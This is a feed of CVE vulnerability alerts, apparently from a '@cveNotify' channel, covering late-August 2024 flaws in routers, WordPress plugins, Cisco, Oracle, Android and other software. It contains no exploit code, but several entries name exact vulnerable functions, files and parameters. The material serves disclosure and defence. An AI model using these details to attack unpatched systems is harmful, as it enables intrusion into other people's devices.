🚨 CVE-2024-27228there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-08-28 19:37:31 |
🚨 CVE-2024-25992In tmu_tz_control of tmu.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-08-28 19:37:30 |
🚨 CVE-2024-0048In Session of AccountManagerService.java, there is a possible method to retain foreground service privileges due to incorrect handling of null responses. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-08-28 19:37:26 |
🚨 CVE-2023-6143Use After Free vulnerability in Arm Ltd Midgard GPU Kernel Driver, Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user to exploit a software race condition to perform improper memory processing operations. If the system’s memory is carefully prepared by the user and the system is under heavy load, then this in turn cause a use-after-free.This issue affects Midgard GPU Kernel Driver: from r13p0 through r32p0; Bifrost GPU Kernel Driver: from r1p0 through r18p0; Valhall GPU Kernel Driver: from r37p0 through r46p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r46p0.🎖@cveNotify |
|
| 2024-08-28 19:37:25 |
🚨 CVE-2023-42581Improper URL validation from InstantPlay deeplink in Galaxy Store prior to version 4.5.64.4 allows attackers to execute JavaScript API to access data.🎖@cveNotify |
|
| 2024-08-28 19:07:24 |
🚨 CVE-2024-40956In the Linux kernel, the following vulnerability has been resolved:dmaengine: idxd: Fix possible Use-After-Free in irq_process_work_listUse list_for_each_entry_safe() to allow iterating through the list anddeleting the entry in the iteration process. The descriptor is freed viaidxd_desc_complete() and there's a slight chance may cause issue forthe list iterator when the descriptor is reused by another threadwithout it being deleted from the list.🎖@cveNotify |
|
| 2024-08-28 18:37:44 |
🚨 CVE-2024-42905Beijing Digital China Cloud Technology Co., Ltd. DCME-320 v.7.4.12.60 has a command execution vulnerability, which can be exploited to obtain device administrator privileges via the getVar function in the code/function/system/tool/ping.php file.🎖@cveNotify |
|
| 2024-08-28 18:37:43 |
🚨 CVE-2023-4025The Radio Player plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the update_player function in versions up to, and including, 2.0.73. This makes it possible for unauthenticated attackers to update player instances.🎖@cveNotify |
|
| 2024-08-28 18:37:42 |
🚨 CVE-2023-4024The Radio Player plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the delete_player function in versions up to, and including, 2.0.73. This makes it possible for unauthenticated attackers to delete player instances.🎖@cveNotify |
|
| 2024-08-28 18:37:38 |
🚨 CVE-2024-7579A vulnerability was found in Alien Technology ALR-F800 up to 19.10.24.00. It has been declared as critical. Affected by this vulnerability is the function popen of the file /var/www/cgi-bin/upgrade.cgi of the component File Name Handler. The manipulation of the argument uploadedFile leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-28 18:37:37 |
🚨 CVE-2024-6361Improper Neutralization vulnerability (XSS) has been discovered in OpenText™ ALM Octane. The vulnerability affects all version prior to version 23.4. The vulnerability could cause remote code execution attack.🎖@cveNotify |
|
| 2024-08-28 18:37:36 |
🚨 CVE-2024-29399An issue was discovered in GNU Savane v.3.13 and before, allows a remote attacker to execute arbitrary code and escalate privileges via a crafted file to the upload.php component.🎖@cveNotify |
|
| 2024-08-28 18:37:32 |
🚨 CVE-2024-30598Tenda FH1203 v2.0.1.6 firmware has a stack overflow vulnerability in the security_5g parameter of the formWifiBasicSet function.🎖@cveNotify |
|
| 2024-08-28 18:37:31 |
🚨 CVE-2024-28553Tenda AC18 V15.03.05.05 has a stack overflow vulnerability in the entrys parameter fromAddressNat function.🎖@cveNotify |
|
| 2024-08-28 18:37:30 |
🚨 CVE-2024-21501Versions of the package sanitize-html before 2.12.1 are vulnerable to Information Exposure when used on the backend and with the style attribute allowed, allowing enumeration of files in the system (including project dependencies). An attacker could exploit this vulnerability to gather details about the file system structure and dependencies of the targeted server.🎖@cveNotify |
|
| 2024-08-28 18:37:26 |
🚨 CVE-2024-25746Stack Based Buffer Overflow vulnerability in Tenda AC9 v.3.0 with firmware version v.15.03.06.42_multi allows a remote attacker to execute arbitrary code via the add_white_node function.🎖@cveNotify |
|
| 2024-08-28 18:37:25 |
🚨 CVE-2023-43301An issue in DARTS SHOP MAXIM mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2024-08-28 18:07:26 |
🚨 CVE-2024-41310AndServer 2.1.12 is vulnerable to Directory Traversal.🎖@cveNotify |
|
| 2024-08-28 18:07:25 |
🚨 CVE-2024-21136Vulnerability in the Oracle Retail Xstore Office product of Oracle Retail Applications (component: Security). Supported versions that are affected are 19.0.5, 20.0.3, 20.0.4, 22.0.0 and 23.0.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Retail Xstore Office. While the vulnerability is in Oracle Retail Xstore Office, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Retail Xstore Office accessible data. CVSS 3.1 Base Score 8.6 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N).🎖@cveNotify |
|
| 2024-08-28 18:07:24 |
🚨 CVE-2024-21132Vulnerability in the Oracle Purchasing product of Oracle E-Business Suite (component: Approvals). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Purchasing. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Purchasing, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Purchasing accessible data as well as unauthorized read access to a subset of Oracle Purchasing accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).🎖@cveNotify |
|
| 2024-08-28 17:37:43 |
🚨 CVE-2024-7744In WS_FTP Server versions before 8.8.8 (2022.0.8), an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in the Web Transfer Module allows File Discovery, Probe System Files, User-Controlled Filename, Path Traversal. An authenticated file download flaw has been identified where a user can craft an API call that allows them to download a file from an arbitrary folder on the drive where that user host's root folder is located (by default this is C:)🎖@cveNotify |
|
| 2024-08-28 17:37:42 |
🚨 CVE-2024-41565JustEnoughItems (JEI) 19.5.0.33 and before contains an Improper Validation of Specified Index, Position, or Offset in Input vulnerability. The specific issue is a failure to validate slot index in JEI for Minecraft, which allows in-game item duplication.🎖@cveNotify |
|
| 2024-08-28 17:37:38 |
🚨 CVE-2024-20478A vulnerability in the software upgrade component of Cisco Application Policy Infrastructure Controller (APIC) and Cisco Cloud Network Controller, formerly Cisco Cloud APIC, could allow an authenticated, remote attacker with Administrator-level privileges to install a modified software image, leading to arbitrary code injection on an affected system.This vulnerability is due to insufficient signature validation of software images. An attacker could exploit this vulnerability by installing a modified software image. A successful exploit could allow the attacker to execute arbitrary code on the affected system and elevate their privileges to root.Note: Administrators should always validate the hash of any upgrade image before uploading it to Cisco APIC and Cisco Cloud Network Controller.🎖@cveNotify |
|
| 2024-08-28 17:37:37 |
🚨 CVE-2024-20413A vulnerability in Cisco NX-OS Software could allow an authenticated, local attacker with privileges to access the Bash shell to elevate privileges to network-admin on an affected device.This vulnerability is due to insufficient security restrictions when executing application arguments from the Bash shell. An attacker with privileges to access the Bash shell could exploit this vulnerability by executing crafted commands on the underlying operating system. A successful exploit could allow the attacker to create new users with the privileges of network-admin.🎖@cveNotify |
|
| 2024-08-28 17:37:36 |
🚨 CVE-2024-20411A vulnerability in Cisco NX-OS Software could allow an authenticated, local attacker with privileges to access the Bash shell to execute arbitrary code as root on an affected device.This vulnerability is due to insufficient security restrictions when executing commands from the Bash shell. An attacker with privileges to access the Bash shell could exploit this vulnerability by executing a specific crafted command on the underlying operating system. A successful exploit could allow the attacker to execute arbitrary code with the privileges of root.🎖@cveNotify |
|
| 2024-08-28 17:37:33 |
🚨 CVE-2024-20289A vulnerability in the CLI of Cisco NX-OS Software could allow an authenticated, low-privileged, local attacker to execute arbitrary commands on the underlying operating system of an affected device. This vulnerability is due to insufficient validation of arguments for a specific CLI command. An attacker could exploit this vulnerability by including crafted input as the argument of the affected command. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of the currently logged-in user.🎖@cveNotify |
|
| 2024-08-28 17:37:32 |
🚨 CVE-2024-20285A vulnerability in the Python interpreter of Cisco NX-OS Software could allow an authenticated, low-privileged, local attacker to escape the Python sandbox and gain unauthorized access to the underlying operating system of the device.The vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by manipulating specific functions within the Python interpreter. A successful exploit could allow an attacker to escape the Python sandbox and execute arbitrary commands on the underlying operating system with the privileges of the authenticated user. Note: An attacker must be authenticated with Python execution privileges to exploit these vulnerabilities. For more information regarding Python execution privileges, see product-specific documentation, such as the section of the Cisco Nexus 9000 Series NX-OS Programmability Guide.🎖@cveNotify |
|
| 2024-08-28 17:37:31 |
🚨 CVE-2024-20279A vulnerability in the restricted security domain implementation of Cisco Application Policy Infrastructure Controller (APIC) could allow an authenticated, remote attacker to modify the behavior of default system policies, such as quality of service (QoS) policies, on an affected system. This vulnerability is due to improper access control when restricted security domains are used to implement multi-tenancy. An attacker with a valid user account associated with a restricted security domain could exploit this vulnerability. A successful exploit could allow the attacker to read, modify, or delete child policies created under default system policies, which are implicitly used by all tenants in the fabric, resulting in disruption of network traffic. Exploitation is not possible for policies under tenants that an attacker has no authorization to access.🎖@cveNotify |
|
| 2024-08-28 17:37:27 |
🚨 CVE-2023-7017Sciener locks' firmware update mechanism do not authenticate or validate firmware updates if passed to the lock through the Bluetooth Low Energy service. A challenge request can be sent to the lock with a command to prepare for an update, rather than an unlock request, allowing an attacker to compromise the device.🎖@cveNotify |
|
| 2024-08-28 17:07:26 |
🚨 CVE-2024-21164Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 7.0.20. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 2.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:N/A:N).🎖@cveNotify |
|
| 2024-08-28 17:07:25 |
🚨 CVE-2024-21161Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 7.0.20. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. Note: This vulnerability applies to Linux hosts only. CVSS 3.1 Base Score 5.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2024-08-28 17:07:24 |
🚨 CVE-2024-21148Vulnerability in the Oracle Applications Framework product of Oracle E-Business Suite (component: Personalization). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data as well as unauthorized read access to a subset of Oracle Applications Framework accessible data. CVSS 3.1 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N).🎖@cveNotify |
|
| 2024-08-28 16:07:26 |
🚨 CVE-2024-34198TOTOLINK AC1200 Wireless Router A3002RU V2.1.1-B20230720.1011 is vulnerable to Buffer Overflow. The formWlEncrypt CGI handler in the boa program fails to limit the length of the wlan_ssid field from user input. This allows attackers to craft malicious HTTP requests by supplying an excessively long value for the wlan_ssid field, leading to a stack overflow. This can be further exploited to execute arbitrary commands or launch denial-of-service attacks.🎖@cveNotify |
|
| 2024-08-28 16:07:25 |
🚨 CVE-2023-51387Hertzbeat is an open source, real-time monitoring system. Hertzbeat uses aviatorscript to evaluate alert expressions. The alert expressions are supposed to be some simple expressions. However, due to improper sanitization for alert expressions in version prior to 1.4.1, a malicious user can use a crafted alert expression to execute any command on hertzbeat server. A malicious user who has access to alert define function can execute any command in hertzbeat instance. This issue is fixed in version 1.4.1.🎖@cveNotify |
|
| 2024-08-28 16:07:24 |
🚨 CVE-2022-39337Hertzbeat is an open source, real-time monitoring system with custom-monitoring, high performance cluster, prometheus-like and agentless. Hertzbeat versions 1.20 and prior have a permission bypass vulnerability. System authentication can be bypassed and invoke interfaces without authorization. Version 1.2.1 contains a patch for this issue.🎖@cveNotify |
|
| 2024-08-28 15:37:36 |
🚨 CVE-2023-49989Hotel Booking Management v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at update.php.🎖@cveNotify |
|
| 2024-08-28 15:37:35 |
🚨 CVE-2024-2174Inappropriate implementation in V8 in Google Chrome prior to 122.0.6261.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-08-28 15:37:31 |
🚨 CVE-2023-49546Customer Support System v1 was discovered to contain a SQL injection vulnerability via the email parameter at /customer_support/ajax.php.🎖@cveNotify |
|
| 2024-08-28 15:37:30 |
🚨 CVE-2024-1670Use after free in Mojo in Google Chrome prior to 122.0.6261.57 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-08-28 15:37:26 |
🚨 CVE-2024-0035In onNullBinding of TileLifecycleManager.java, there is a possible way to launch an activity from the background due to a missing null check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-08-28 15:37:25 |
🚨 CVE-2023-42890The issue was addressed with improved memory handling. This issue is fixed in Safari 17.2, macOS Sonoma 14.2, watchOS 10.2, iOS 17.2 and iPadOS 17.2, tvOS 17.2. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-08-28 14:37:42 |
🚨 CVE-2023-26324A code execution vulnerability exists in the XiaomiGetApps application product. This vulnerability is caused by the verification logic being bypassed, and an attacker can exploit this vulnerability to execute malicious code.🎖@cveNotify |
|
| 2024-08-28 14:37:37 |
🚨 CVE-2024-45346The Xiaomi Security Center expresses heartfelt thanks to Ken Gannon and Ilyes Beghdadi of NCC Group working with Trend Micro Zero Day Initiative! At the same time, we also welcome more outstanding and professional security experts and security teams to join the Mi Security Center (MiSRC) to jointly ensure the safe access of millions of Xiaomi users worldwide Life.🎖@cveNotify |
|
| 2024-08-28 14:37:36 |
🚨 CVE-2024-8088There is a HIGH severity vulnerability affecting the CPython "zipfile"module affecting "zipfile.Path". Note that the more common API "zipfile.ZipFile" class is unaffected.When iterating over names of entries in a zip archive (for example, methodsof "zipfile.Path" like "namelist()", "iterdir()", etc)the process can be put into an infinite loop with a maliciously craftedzip archive. This defect applies when reading only metadata or extractingthe contents of the zip archive. Programs that are not handlinguser-controlled zip archives are not affected.🎖@cveNotify |
|
| 2024-08-28 14:37:32 |
🚨 CVE-2024-35325A vulnerability was found in libyaml up to 0.2.5. Affected by this issue is the function yaml_event_delete of the file /src/libyaml/src/api.c. The manipulation leads to a double-free.🎖@cveNotify |
|
| 2024-08-28 14:37:31 |
🚨 CVE-2024-29271Reflected Cross-Site Scripting (XSS) vulnerability in VvvebJs before version 1.7.7, allows remote attackers to execute arbitrary code and obtain sensitive information via the action parameter in save.php.🎖@cveNotify |
|
| 2024-08-28 14:37:30 |
🚨 CVE-2024-28756The SolarEdge mySolarEdge application before 2.20.1 for Android has a certificate verification issue that allows a Machine-in-the-middle (MitM) attacker to read and alter all network traffic between the application and the server.🎖@cveNotify |
|
| 2024-08-28 14:37:26 |
🚨 CVE-2024-28669DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/freelist_edit.php.🎖@cveNotify |
|
| 2024-08-28 14:37:25 |
🚨 CVE-2024-23216A path handling issue was addressed with improved validation. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to overwrite arbitrary files.🎖@cveNotify |
|
| 2024-08-28 14:07:32 |
🚨 CVE-2024-42362Hertzbeat is an open source, real-time monitoring system. Hertzbeat has an authenticated (user role) RCE via unsafe deserialization in /api/monitors/import. This vulnerability is fixed in 1.6.0.🎖@cveNotify |
|
| 2024-08-28 14:07:31 |
🚨 CVE-2024-42361Hertzbeat is an open source, real-time monitoring system. Hertzbeat 1.6.0 and earlier declares a /api/monitor/{monitorId}/metric/{metricFull} endpoint to download job metrics. In the process, it executes a SQL query with user-controlled data, allowing for SQL injection.🎖@cveNotify |
|
| 2024-08-28 13:07:28 |
🚨 CVE-2024-1544Generating the ECDSA nonce k samples a random number r and then truncates this randomness with a modular reduction mod n where n is the order of the elliptic curve. Meaning k = r mod n. The division used during the reduction estimates a factor q_e by dividing the upper two digits (a digit having e.g. a size of 8 byte) of r by the upper digit of n and then decrements q_e in a loop until it has the correct size. Observing the number of times q_e is decremented through a control-flow revealing side-channel reveals a bias in the most significant bits of k. Depending on the curve this is either a negligible bias or a significant bias large enough to reconstruct k with lattice reduction methods. For SECP160R1, e.g., we find a bias of 15 bits.🎖@cveNotify |
|
| 2024-08-28 13:07:27 |
🚨 CVE-2022-39997A weak password requirement issue was discovered in Teldats Router RS123, RS123w allows a remote attacker to escalate privileges🎖@cveNotify |
|
| 2024-08-28 12:37:26 |
🚨 CVE-2024-7447The Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'fnsf_af2_handel_file_upload' function in all versions up to, and including, 3.7.3.2. This makes it possible for unauthenticated attackers to upload arbitrary media to the site, even if no forms exist.🎖@cveNotify |
|
| 2024-08-28 12:37:25 |
🚨 CVE-2024-45346The Xiaomi Security Center expresses heartfelt thanks to Ken Gannon and Ilyes Beghdadi of NCC Group working with Trend Micro Zero Day Initiative! At the same time, we also welcome more outstanding and professional security experts and security teams to join the Mi Security Center (MiSRC) to jointly ensure the safe access of millions of Xiaomi users worldwide Life.🎖@cveNotify |
|
| 2024-08-28 12:37:24 |
🚨 CVE-2024-7608An authenticated user can access the restricted files from NX, EX, FX, AX, IVX and CMS using path traversal.🎖@cveNotify |
|
| 2024-08-28 11:37:31 |
🚨 CVE-2022-4862Rendering of HTML provided by another authenticated user is possible in browser on M-Files Web before 22.12.12140.3. This allows the content to steal user sensitive information. This issue affects M-Files New Web: before 22.12.12140.3.🎖@cveNotify |
|
| 2024-08-28 11:37:30 |
🚨 CVE-2022-4861Incorrect implementation in authentication protocol in M-Files Client before 22.5.11356.0 allows high privileged user to get other users tokens to another resource.🎖@cveNotify |
|
| 2024-08-28 11:37:26 |
🚨 CVE-2022-4264Incorrect Privilege Assignment in M-Files Web (Classic) in M-Files before 22.8.11691.0 allows low privilege user to change some configuration.🎖@cveNotify |
|
| 2024-08-28 11:37:25 |
🚨 CVE-2022-1606Incorrect privilege assignment in M-Files Server versions before 22.3.11164.0 and before 22.3.11237.1 allows user to read unmanaged objects.🎖@cveNotify |
|
| 2024-08-28 09:37:32 |
🚨 CVE-2023-2480Missing access permissions checks in M-Files Client before 23.5.12598.0 (excluding 23.2 SR2 and newer) allows elevation of privilege via UI extension applications🎖@cveNotify |
|
| 2024-08-28 09:37:26 |
🚨 CVE-2023-2112Desktop component service allows lateral movement between sessions in M-Files before 23.4.12455.0.🎖@cveNotify |
|
| 2024-08-28 09:37:25 |
🚨 CVE-2023-0213Elevation of privilege issue in M-Files Installer versions before 22.6 on Windows allows user to gain SYSTEM privileges via DLL hijacking.🎖@cveNotify |
|
| 2024-08-28 08:37:30 |
🚨 CVE-2023-26323A code execution vulnerability exists in the Xiaomi App market product. The vulnerability is caused by unsafe configuration and can be exploited by attackers to execute arbitrary code.🎖@cveNotify |
|
| 2024-08-28 08:37:26 |
🚨 CVE-2023-26321A path traversal vulnerability exists in the Xiaomi File Manager application product(international version). The vulnerability is caused by unfiltered special characters and can be exploited by attackers to overwrite and execute code in the file.🎖@cveNotify |
|
| 2024-08-28 08:37:25 |
🚨 CVE-2023-6912Lack of protection against brute force attacks in M-Files Server before 23.12.13205.0 allows an attacker unlimited authentication attempts, potentially compromising targeted M-Files user accounts by guessing passwords.🎖@cveNotify |
|
| 2024-08-28 07:37:32 |
🚨 CVE-2021-38122A Cross-Site Scripting vulnerable identified in NetIQ Advance Authentication that impacts the server functionality and disclose sensitive information.This issue affects NetIQ Advance Authentication before 6.3.5.1🎖@cveNotify |
|
| 2024-08-28 07:37:26 |
🚨 CVE-2021-38121Insufficient or weak TLS protocol version identified in Advance authentication client server communication when specific service is accessed between devices. This issue affects NetIQ Advance Authentication versions before 6.3.5.1🎖@cveNotify |
|
| 2024-08-28 07:37:25 |
🚨 CVE-2021-22529A vulnerability identified in NetIQ Advance Authentication that leaks sensitive server information. This issue affects NetIQ Advance Authentication version before 6.3.5.1🎖@cveNotify |
|
| 2024-08-28 07:37:24 |
🚨 CVE-2021-22509A vulnerability identified in storing and reusing information in Advance Authentication. This issue can lead to leakage of sensitive data to unauthorized user. The issue affects NetIQ Advance Authentication before 6.3.5.1🎖@cveNotify |
|
| 2024-08-28 06:37:25 |
🚨 CVE-2023-43078Dell Dock Firmware and Dell Client Platform contain an Improper Link Resolution vulnerability during installation resulting in arbitrary folder deletion, which could lead to Privilege Escalation or Denial of Service.🎖@cveNotify |
|
| 2024-08-28 06:37:24 |
🚨 CVE-2024-7401Netskope was notified about a security gap in Netskope Client enrollment process where NSClient is using a static token “Orgkey” as authentication parameter. Since this is a static token, if leaked, cannot be rotated or revoked. A malicious actor can use this token to enroll NSClient from a customer’s tenant and impersonate a user.🎖@cveNotify |
|
| 2024-08-28 05:37:24 |
🚨 CVE-2023-45896ntfs3 in the Linux kernel before 6.5.11 allows a physically proximate attacker to read kernel memory by mounting a filesystem (e.g., if a Linux distribution is configured to allow unprivileged mounts of removable media) and then leveraging local access to trigger an out-of-bounds read. A length value can be larger than the amount of memory allocated. NOTE: the supplier's perspective is that there is no vulnerability when an attack requires an attacker-modified filesystem image.🎖@cveNotify |
|
| 2024-08-28 04:37:24 |
🚨 CVE-2024-6448The Mollie Payments for WooCommerce plugin for WordPress is vulnerable to information exposure in all versions up to, and including, 7.7.0. This is due to the error reporting being enabled by default in multiple plugin files. This makes it possible for unauthenticated attackers to obtain the full path to instances, which they may be able to use in combination with other vulnerabilities or to simplify reconnaissance work. On its own, this information is of very limited use.🎖@cveNotify |
|
| 2024-08-28 03:37:25 |
🚨 CVE-2024-8030The Ultimate Store Kit Elementor Addons, Woocommerce Builder, EDD Builder, Elementor Store Builder, Product Grid, Product Table, Woocommerce Slider plugin is vulnerable to PHP Object Injection via deserialization of untrusted input via the _ultimate_store_kit_wishlist cookie in versions up to , and including, 2.0.3. This makes it possible for an unauthenticated attacker to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker or above to delete arbitrary files, retrieve sensitive data, or execute code.🎖@cveNotify |
|
| 2024-08-28 03:37:24 |
🚨 CVE-2024-7573The Relevanssi Live Ajax Search plugin for WordPress is vulnerable to argument injection in all versions up to, and including, 2.4. This is due to insufficient validation of input supplied via POST data in the 'search' function. This makes it possible for unauthenticated attackers to inject arbitrary arguments into a WP_Query query and potentially expose sensitive information such as attachments or private posts.🎖@cveNotify |
|
| 2024-08-28 02:37:25 |
🚨 CVE-2024-8231A vulnerability classified as critical has been found in Tenda O6 1.0.0.7(2054). Affected is the function fromVirtualSet of the file /goform/setPortForward. The manipulation of the argument ip/localPort/publicPort/app leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-28 02:37:24 |
🚨 CVE-2024-8230A vulnerability was found in Tenda O6 1.0.0.7(2054). It has been rated as critical. This issue affects the function fromSafeSetMacFilter of the file /goform/setMacFilterList. The manipulation of the argument remark/type/time leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-28 01:37:24 |
🚨 CVE-2024-8229A vulnerability was found in Tenda O6 1.0.0.7(2054). It has been declared as critical. This vulnerability affects the function frommacFilterModify of the file /goform/operateMacFilter. The manipulation of the argument mac leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-28 01:07:25 |
🚨 CVE-2024-38856Incorrect Authorization vulnerability in Apache OFBiz.This issue affects Apache OFBiz: through 18.12.14.Users are recommended to upgrade to version 18.12.15, which fixes the issue.Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints).🎖@cveNotify |
|
| 2024-08-28 00:37:39 |
🚨 CVE-2024-8227A vulnerability was found in Tenda O1 1.0.0.7(10648) and classified as critical. Affected by this issue is the function fromDhcpSetSer of the file /goform/DhcpSetSer. The manipulation of the argument dhcpStartIp/dhcpEndIp/dhcpGw/dhcpMask/dhcpLeaseTime/dhcpDns1/dhcpDns2 leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-28 00:37:38 |
🚨 CVE-2024-4067The NPM package `micromatch` prior to 4.0.8 is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in `micromatch.braces()` in `index.js` because the pattern `.*` will greedily match anything. By passing a malicious payload, the pattern matching will keep backtracking to the input while it doesn't find the closing bracket. As the input size increases, the consumption time will also increase until it causes the application to hang or slow down. There was a merged fix but further testing shows the issue persists. This issue should be mitigated by using a safe pattern that won't start backtracking the regular expression due to greedy matching. This issue was fixed in version 4.0.8.🎖@cveNotify |
|
| 2024-08-27 23:37:25 |
🚨 CVE-2024-8223A vulnerability classified as critical was found in SourceCodester Music Gallery Site 1.0. This vulnerability affects unknown code of the file /classes/Master.php?f=delete_category. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-27 23:37:24 |
🚨 CVE-2024-8222A vulnerability classified as critical has been found in SourceCodester Music Gallery Site 1.0. This affects an unknown part of the file /admin/?page=musics/manage_music. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-27 22:37:25 |
🚨 CVE-2024-8220A vulnerability was found in itsourcecode Tailoring Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file staffedit.php. The manipulation of the argument id/stafftype/address/fullname/phonenumber/salary leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-27 22:37:24 |
🚨 CVE-2024-8219A vulnerability was found in code-projects Responsive Hotel Site 1.0. It has been classified as critical. Affected is an unknown function of the file index.php. The manipulation of the argument name/phone/email leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-27 21:37:43 |
🚨 CVE-2024-28392SQL injection vulnerability in pscartabandonmentpro v.2.0.11 and before allows a remote attacker to escalate privileges via the pscartabandonmentproFrontCAPUnsubscribeJobModuleFrontController::setEmailVisualized() method.🎖@cveNotify |
|
| 2024-08-27 21:37:42 |
🚨 CVE-2024-27757flusity CMS through 2.45 allows tools/addons_model.php Gallery Name XSS. The reporter indicates that this product "ceased its development as of February 2024."🎖@cveNotify |
|
| 2024-08-27 21:37:37 |
🚨 CVE-2024-26521HTML Injection vulnerability in CE Phoenix v1.0.8.20 and before allows a remote attacker to execute arbitrary code, escalate privileges, and obtain sensitive information via a crafted payload to the english.php component.🎖@cveNotify |
|
| 2024-08-27 21:37:36 |
🚨 CVE-2024-25986In ppmp_unprotect_buf of drm_fw.c, there is a possible compromise of protected memory due to a logic error in the code. This could lead to local escalation of privilege to TEE with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-08-27 21:37:32 |
🚨 CVE-2024-23285This issue was addressed with improved handling of symlinks. This issue is fixed in macOS Sonoma 14.4. An app may be able to create symlinks to protected regions of the disk.🎖@cveNotify |
|
| 2024-08-27 21:37:31 |
🚨 CVE-2024-20018In wlan driver, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: WCNCR00348479; Issue ID: MSV-1019.🎖@cveNotify |
|
| 2024-08-27 21:37:30 |
